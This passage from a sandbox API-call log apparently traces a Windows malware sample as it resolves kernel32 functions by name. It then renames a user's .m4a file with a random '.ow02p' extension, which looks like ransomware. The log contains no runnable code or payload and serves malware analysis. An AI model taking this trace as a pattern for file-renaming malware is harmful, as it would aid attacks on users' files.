lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.376] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.376] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.376] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.376] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.376] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.376] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.376] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.376] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.376] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.376] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.376] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.377] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.377] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.377] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.377] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.377] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.377] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.377] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.377] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.377] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.377] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.377] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.377] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.377] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.377] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.377] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.377] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.377] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.377] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.378] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.378] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.378] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.378] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.378] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.378] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.378] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.378] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.378] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.378] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.378] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.378] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.378] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.378] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.378] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.378] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.378] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.378] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.378] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.378] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.379] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.379] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.379] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.379] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.379] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.379] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.379] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.379] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.379] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.379] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.379] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.379] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.379] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.379] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.379] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.379] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.379] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.379] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.380] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.380] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.380] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.380] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.380] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.380] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.380] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.380] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.380] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.380] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.380] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.380] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.380] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.380] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.380] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.380] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.380] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.380] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.380] lstrlenA (lpString="DELETEATOM") returned 10 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.381] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.381] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.381] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.381] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.381] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.381] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.381] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.381] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.381] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.381] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.381] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.381] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.381] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.381] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.381] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.381] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.381] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.381] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.382] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.382] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.382] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.382] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.382] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.382] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.382] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.382] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.382] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.382] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.382] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.382] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.382] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.382] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.382] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.382] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.382] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.382] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.382] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.383] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.383] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.383] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.383] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.383] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.383] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.383] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.383] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.383] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.383] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.383] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.383] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a") returned 73 [0085.383] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a.ow02p") returned 79 [0085.383] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\n 30hpefio2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\N 30hPEFiO2.m4a.ow02p" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\n 30hpefio2.m4a.ow02p"), dwFlags=0x0) returned 1 [0085.384] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.384] VirtualFree 